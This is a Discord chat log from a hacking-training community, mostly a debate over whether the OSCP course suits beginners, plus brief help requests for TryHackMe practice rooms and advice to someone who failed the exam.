Its good to have a guide if you're a beginner, but once you get into it, you need have highly developed enumeration skills for when blackbox pentesting happens. Getting answers creates a bad habit in my opinion, of giving up on something you can't figure out and you won't always have someone to give you those answers

OSCP is a beginner / foundational course . That’s how is being marketed by OffSec

Its a buzz word

You keep pairing the concept “giving answers” with “proper training”, they are not the same .

Pentesting is not a beginner level field

The best example , again, this site , virtual hacking labs

If you haven’t seen it, enroll , or eLearning , then you may understand what I’m saying

There is a difference between real life and CTF machines, The OSCP path was developed from offsec

You can't give credit to the OSCP path without giving credit to PWK

I will go beyond , if PTP was much more popular , I can assure you people would be pursuing that one instead

And the main reason why OffSec copies and updated their material this year , which has been already done by eLearning

As an A+ “HR filter”, OSCP excels

It excels literally because of "Try Harder"

My opinion is that PTP is way better

@alpine peak you know ? Whatever man

Gotta go, let’s agree to disagree

Yea, the ideals are just different, I just believe "Try Harder" because it worked for me

@alpine peak and that’s a valid point

I hated the motto "Try Harder" when I was doing it because I was stressed all the time, but in hindsight, I agree with it

@alpine peak oscp is a beginner level training and cert. I agree with @fleet wedge try harder is not a training method. Concepts need to be explained and demonstrated. Training is meant to fill gaps and just saying a phase does not help fill that gap.

@simple kestrel the most important skill in hacking is research. You need to be able to learn for yourself -- look things up. Teach yourself.
Nothing good comes from being spoon fed. Not past the training wheels anyway, and OSCP makes no claim to be an introductory certification.

Try Harder is very much a training methodology, and it's the mindset that we all need to adopt if we're going to get anywhere in the real world

They literally say those new to infosec or pentesting should start here

Try harder is crap. I agree that a pentesters should be able to research. But if you have a training class telling some one to try harder is not a training method. It is a gap in your training.

If it was an advance class or training then yes I could see that.

oscp is like a medium rated beginner cert

Or something like we taught you reflective xss figure out how to do stored

Most pentesters claim it to be easy but you still need a basic knowledge to finish it. Just raw dogging pwk won't be enough

It not it says intro to infosec. Go look at the site

It's foundational for penetration testing -- literally one of the most advanced fields in computer science. I quote here, it's for "those seeking a step up in their skills and career".
That's not to say that it's necessarily hard, but it's also not designed for complete beginners

It's designed to train you how to think, and how to use the tools on offer

It's not there to hold your hand

Foundation

Notice that it's not a foundation for Linux. It's not a foundation for computer science. It's not a foundation for basic concepts

It's a foundation for penetration testing

You can't do pentesting unless you're already pretty damn good with computers -- that's literally the original definition of a "hacker": someone good enough to make computers do stuff they ain't meant to do

unfortunately pentesting isn't a competency that a regular cs student will know without exposure. It requires dedication

I'm on the kenobi box but there is no SSH key in the /tmp directory?

Exactly that ^^

I agree @final vault but if you are teaching a foundation class then you need to teach all the concepts.

Man I can't justify it anymore than I or muirland has.

@signal pumice pretty sure you need to move it there yourself

just because it's foundation doesn't make it easy

I'm a fucking idiot, cheers

I'm sure the foundations of nuclear fusion isn't easy

Good way to look at it

No

You can't have a foundation to an advanced topic without building on prior knowledge

You had to learn about atoms in order to do nuclear fusion

You've gotta learn a lot more than that...

That what I am saying

Oh good, so we're agreed? A foundation for an advanced topic needs prior knowledge?

Read only FS 🤔

Yes, and you have to learn about networking fundamentals, software dev and an understanding of at least every part of CS to do pentesting

Again everyone opinion different on this.

So again they can't tailor a course to spoon feed that

No. That isn't an opinion, mate.
That's a fact of life

Have a training class means that you are training people. And that includes concepts. If people are complaining then you have gaps in your training

Pentesting is built on top of everything

It's literally based on a mastery of computer science

hence the salaries

At the end of the day this isn't school anymore, pentesting is something we have all chosen to pursue, whether for fun to participate in CTFs or to do it as a career. No one forces you to learn however it is a choice to push yourself to succeed

No one in life will give you 100% coverage on everything. PWK is known to give a decent understanding of what is expected, however there will be gaps. Those you should know you have to find out yourself and push to understand them

You might struggle with how the material covers those topics. Well bad news time to find another source and try understand it

And that's the important thing. Pushing yourself. No one is going to be around to hold your hand forever. Research is the most important skill we'll ever learn -- especially for pentesting: a job that literally requires you to know more than you can ever possibly know straight off

thank you for coming to our ted talk

That ^^

W/e . It is a matter of opinion.

Not really, but sure 🤷‍♂️

You can never give up, you can never surrender, fight the good fight til the end of the night and always rememeber

Unless you're @jovial pawn, then surrender is in your DNA ❤️

love you Horse

😂 😂 😂 😂 😂

I am speechless

🏳️

con comme une valise sans poignée

what

the

hell

Is that for you?

^ So, Nope its not beginner level according to offsec

Weird.

^

I told offsec, I had no experience and they send that to people

Ah sheeiittt

Weird, oh well. bad advertising on their behalf.

Everyone is acting like PWK is beginner level just because they saw it online somewhere, but offsec saids its not

tryhackme is actually beginner level

^^ It requires a fairly decent knowledge level and the site says that when you go to sign up for the course

If I remember reading it correctly last week when I signed up

I always disagreed with people saying PWK is beginner level, because they literally just expect you to know from the start

they say it's entry level for their ecosystem iirc, not beginner level

Well they used the word entry level and said PWK is not that so?

@simple kestrel -- for the record, that is the official response from offsec ^^

Wait for a response to that. It might be necessary...

^

So what you're saying is I need to bribe g0tmi1k and Owen when I sit my exam

gotcha

nah TJ kekw

ye @final vault

oof

They won't take bribes

tbh I gotta spend some serious time on windows

bribes@offensive-security.com

The company has a pretty large legal dept, so you might get sued for even trying

I was joking 😂 but hey

Man hasn't got the money to bribe

if I did I'd just hire an Indian guy on fiver

Mentioning the OSCP exam is sketchy to me, because cheating is considered 1st degree murder to them

^ I think thats were they earn most of their money

So its threating their livelihood if the certs rep gets damaged.

they will literally sue you for a lot of money

OSWP isn't even proctored kekw

No one really cares about that cert anyway

OSWP was pretty fun tbh

just because you speedran it

only bc OffSec had some issues getting it setup

and because the challenges department got back to me 30 minutes into the real start of my exam

😂😂 tbh you did speed run it

listen

Discord chat. Oh there’s one flag, there’s two, there’s 3. Done

1:30 is pretty impressive time

although it could be done faster

Amazon certs are worth a lot of money now

Cloud is worth a lot of money in general

Azure is becoming a pretty big thing

Primary AWS and Azure

Azure just got into the market way to late and AWS took it

I've heard a lot more conversations surrounding Azure as of late though

AWS is 30% of the market and Azure is 16%

AWS is still way larger according to the market

i think cloud is one of the things that needs a lot more exposure in terms of testing

The security is often the job of the DevOps engineer

and that explains why there's a security concern of the cloud

Depends

That's why avarage salary is up to 100,000/year because its hard to find experts with cloud

fair point

Linux Academy is profiting from this

I love Linux Academy. Another great platform. I passed one of the AWS certs with flying colors just using that

Very hands on and quality material and teachers

I agree, I passed the LPIC1 because of them

Hey can I pm anyone for help with skynet? the exploit is not working properly

You can DM me if you’d like. On phone though so you’ll probably have to send pics to refresh my memory

Hello everyone, I haven't enrolled yet to any paths but can someone tell me how does the learning path looks like? if that's okay

learning path is basically a collection of rooms placed in a strict order so it would give you a right path of learning (so you wouldn't start with harder rooms or wouldn't feel lost)

@bronze zenith thanks for reply, that sounds nice. is it only texts or some video explanation

and thanks again for help

brb

path is rooms (which obviously have text walkthroughs (now even videos))

hey

hey could i pm anyone for help with 1 step of the hackpark

@rotund carbon hi

I’m currently working on that one but feel free to PM me

After 2 days I m not able to escalate skynet. Never doing the same things on walkthrough

Any help?

dude just completed skynet after 12 hours going crazy

hmu for help

I'm on the HackParck Question 4 of Task 4: I used run event_manager.rb -l system but not sure for what I am looking and nothing is standing out

yes same for me , i need the help on that only @rotund carbon

I attempted my OSCP exam yesterday and it didn’t go too well. Im just not sure where to go from here.

I'm pretty sure, with a bit more experience you'll make it 🙂

guys is this the right place to ask for help re the OSCP-PATH and the vulnversity room?

@hard shoal take a week break , and use tryhackme VIP and virtualhackinglab. Don’t despair , it’s an easy test

@hoary hazel Yep it is . I did vulnersity, I can guide you with it . PM me if you want

I done most of The OSCP path on here. I don’t know if I was overthinking stuff or what happen. I just flopped big time.

No one can guaranteer that OSCP will give you enough knowledge to pass the oscp exam

it is a great way to expand you knowledge

Yeh for sure Im just not sure where to go from here. As I dont know if I missed stuff or I was trying the right thing in the wrong way.

Establish a process, I think that’s important. And you can extrapolate later

Besides tryhackme, I like HTB VIP. Have you being there ?

I had a process just nothing worked as I expected lol was not sure if I was over thinking stuff or just missing really obvious stuff. No I have not done HTB but have watch the recommended video from IPPsec on the OSCP path.

I like HTB VIP. I will recommend you the retired boxes

I’ve also enjoyed OSCP path here . Some machines may be too easy for you, but it’s a nice refresher .

Sure thanks I just don't know where I need to improve. I think my Enum was fine but everything I tried didnt work so either I was overthinking stuff or missing something.

@hard shoal another great resource at a nice price : https://www.virtualhackinglabs.com

We also have a nice discord channel, I’m part of it. With few people who had passed OSCP already

hello

I enrolled yesterday but I cannot find any videos of tutorial or so

All I see is questions

Pls where can I find tuts

@lilac frost not all rooms have videos yet:)

The first room did not have videos

Blue and nmap have videos, there are 2 more coming in the next day or so.

https://tryhackme.com/hacktivities#video

I am a complete beginner

okai, I would say wait 24 hours - there is a beginner room that is going to include a video

Will help you a lot.

In the mean time I'd suggest doing a Linux room

https://tryhackme.com/room/zthlinux

aii thanks

darkstar does have a good voice for it

@topaz yoke Now you see why:)

better than my redneck voice 🙂

Never heard you speak I dont think

I dont think heard me either

Yes you have

I have

o rly?

Mi mi mi mi mi mi

You interviewed me because I made machines for vulnhub

ohhhhh yeaaahhhh

That was such a long time ago

Well it feels it

You're very british, that's what I remember

Aha, I don't sound my age is all I know.

But thanks? I think